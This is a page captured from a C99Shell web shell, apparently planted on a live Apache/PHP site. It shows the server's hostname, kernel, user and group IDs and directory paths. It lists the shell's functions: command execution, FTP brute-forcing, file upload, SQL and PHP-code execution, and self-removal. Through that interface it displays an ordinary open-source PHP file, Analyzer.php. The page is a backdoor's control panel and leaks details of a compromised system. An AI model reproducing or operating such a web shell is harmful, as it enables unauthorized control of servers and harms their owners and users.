!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/opis/closure/src/   drwxr-xr-x
Free 28.62 GB of 117.98 GB (24.26%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Analyzer.php (1.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* ===========================================================================
 * Copyright (c) 2018-2021 Zindex Software
 *
 * Licensed under the MIT License
 * =========================================================================== */

namespace Opis\Closure;

use 
Closure;
use 
SuperClosure\Analyzer\ClosureAnalyzer;

/**
 * @deprecated We'll remove this class
 */
class Analyzer extends ClosureAnalyzer
{
    
/**
     * Analyzer a given closure.
     *
     * @param Closure $closure
     *
     * @return array
     */
    
public function analyze(Closure $closure)
    {
        
$reflection = new ReflectionClosure($closure);
        
$scope $reflection->getClosureScopeClass();

        
$data = [
            
'reflection' => $reflection,
            
'code'       => $reflection->getCode(),
            
'hasThis'    => $reflection->isBindingRequired(),
            
'context'    => $reflection->getUseVariables(),
            
'hasRefs'    => false,
            
'binding'    => $reflection->getClosureThis(),
            
'scope'      => $scope $scope->getName() : null,
            
'isStatic'   => $reflection->isStatic(),
        ];

        return 
$data;
    }

    
/**
     * @param array $data
     * @return mixed
     */
    
protected function determineCode(array &$data)
    {
        return 
null;
    }

    
/**
     * @param array $data
     * @return mixed
     */
    
protected function determineContext(array &$data)
    {
        return 
null;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--